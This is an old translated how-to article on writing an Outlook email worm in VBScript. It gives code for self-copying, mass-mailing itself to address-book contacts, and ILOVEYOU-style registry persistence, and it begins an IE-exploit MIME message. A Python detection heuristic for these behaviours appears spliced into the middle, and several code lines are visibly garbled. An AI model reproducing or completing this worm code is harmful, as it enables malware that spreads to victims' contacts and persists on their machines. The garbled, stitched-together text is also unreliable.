How to use Outlook vulnerability to write viral scripts
Original: Coolweis (Coolweis). Source: Coolweis, "How to Write Worm Virus". Coolweis@NetGuard.com.cn, April 6, 2001 01:22 AM

Reportedly, a "foot-and-mouth disease" virus that spreads through Outlook has been discovered, so it seems Microsoft is in for trouble for a while. Outlook is notorious for transmitting viruses: ILOVEYOU, Melissa and other viruses that caused great damage all spread through Outlook. The root cause is Outlook's user-friendliness, tight integration and complex scripting support; these are what allow viruses to spread.

Let's look at the mechanism by which Outlook spreads viruses. First, the main characteristics of a virus: self-replication, propagation, and latency.

We start with self-replication. A virus spreads by replicating itself, either through other emails or on its own. Viruses that propagate through Outlook are mostly written in VBScript. Self-replication essentially consists of the program copying its own script content to a temporary file, which is then sent as an attachment in the propagation step. Here is how a script does this:

    SET SO = CREATEOBJECT ("scripting.filesystemObject")
    SO.GETFILE (WScript.scriptfullName) .copy ("c: /dateiname.vbs")

These two lines copy the script to the file Dateiname.vbs in the root directory of the C drive. The first line creates a file system object. The second line opens the script file itself: WScript.ScriptFullName is the full path and file name of the running script, the GetFile function gets that file, and the Copy function copies it to Dateiname.vbs on the C drive. This is a feature of most viruses written in VBScript.

As you can see, disabling the file system object is enough to contain the spread of this kind of virus. The following command disables the file system object:

    Regsvr32 Scrrun.dll /u

Now let's look at propagation.
A virus needs to spread, and an email virus naturally spreads by email. Outlook's address book is a convenient feature, but it also opens the door to viruses. Almost all email viruses that propagate through Outlook do so by sending the same script attachment to the email addresses stored in the address book.
Take a look at the following code:

    set = creteObject ("Outlook.Application")
    on Error Resume Next
    for x = 1 to 50
    set mail = = teteItem (0)
    mail.to = Ol.getNameSpace ("MAPI"). AddressLists (1) .addressentries (x)
    mail.subject = "betreff der e-mail"
    mail.body = "text der e-mail"
    mail.ttachments.add ("c: /Dateina.vbs")
    mail.send
    Next
    OL .Quit

This short fragment sends an email to the first 50 entries in the address book, with the script itself as the attachment. The first line creates an Outlook object. Below it is a loop that keeps sending the same message, taking each address in the address book in turn.

As for latency, most such viruses read and modify registry values to check various conditions and remove some restrictions. The following example is taken from part of the ILOVEYOU virus code:

    On Error Resume Next
    dim wscr, rr
    set wscr = CreateObject ( "WScript.Shell")
    rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scripting Host / Settings / Timeout ")
    IF (rr> = 1) THEN
    wscr.regwrite" HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout ", 0," REG_DWORD "
    END IF

This clearly adjusts the scripting timeout setting. The following piece of code modifies the registry so that the script is executed automatically at every system startup:

    regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs"
    regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft /Windows/currentversion/runservices/win32dll", dirwin&"/win32dll.vbs "

Here MSKernel32.vbs and Win32dll.vbs are copies of the virus script. The ILOVEYOU virus also made some other modifications.

From the above, it can be seen that writing an email virus that propagates through Outlook is very simple. But because it spreads as an attachment, its propagation efficiency is somewhat reduced.
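The three behaviours described above (self-copy, address-book mailing, registry changes) can also be read as detection signatures. The following is an added example, not code from the original article: a static heuristic in Python that flags VBScript text containing those token combinations. The rule names, function names and both sample fragments are constructed for illustration.

```python
import re

# Each rule lists tokens that must ALL be present. VBScript is case-insensitive
# and tolerates spaces around "." and path separators, so patterns allow both.
SEP = r"\s*[\\/]\s*"
RULES = {
    "self_copy": [r"scripting\.filesystemobject",
                  r"wscript\s*\.\s*scriptfullname", r"\.\s*copy\b"],
    "outlook_mass_mail": [r"outlook\.application", r"addressentries",
                          r"attachments\s*\.\s*add", r"\.\s*send\b"],
    "run_key_persistence": [r"currentversion" + SEP + r"run(services)?" + SEP,
                            r"reg(write|create)"],
    "wsh_timeout_tamper": [r"windows scripting host" + SEP + "settings"
                           + SEP + "timeout", r"regwrite"],
}

def scan(script_text):
    """Return sorted names of the rules whose tokens all occur in the text."""
    return sorted(name for name, patterns in RULES.items()
                  if all(re.search(p, script_text, re.IGNORECASE)
                         for p in patterns))

def is_mail_worm_like(script_text):
    """Self-copy combined with address-book mailing, as the article describes."""
    hits = scan(script_text)
    return "self_copy" in hits and "outlook_mass_mail" in hits

# Constructed, non-functional fragments used only as scanner input.
SUSPECT = r'''
Set so = CreateObject("Scripting.FileSystemObject")
so.GetFile(WScript.ScriptFullName).Copy("c:\dateiname.vbs")
Set ol = CreateObject("Outlook.Application")
mail.To = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
mail.Attachments.Add("c:\dateiname.vbs")
mail.Send
wscr.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", p
'''
BENIGN = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
fso.GetFile("C:\logs\app.log").Copy "D:\backup\app.log"
'''

if __name__ == "__main__":
    for label, text in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, scan(text), is_mail_worm_like(text))
```

Requiring every token of a rule keeps an ordinary admin script that merely copies a file with FileSystemObject from being flagged; a mail gateway or endpoint check would run this over extracted .vbs attachments.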
The following method relies on the latest IE vulnerability.
Here is part of a message for this vulnerability:

    from: "xxxxx"
    Subject: mail
    date: Thu, 2 Nov 2000 13:27:33 0100
    Mime-Version: 1.0
    Content-Type: Multipart / Related; type = "multipart / alternative" Boundary = "1"
    x-priority: 3
    x-msmail-priority: Normal

    --1
    Content-Type: Multipart / Alternative; Boundary = "2"

    --2
    Content-Type: Text / HTML; Charset = "ISO- 8859-1 "
    Content-Transfer-Encoding: quoted-printable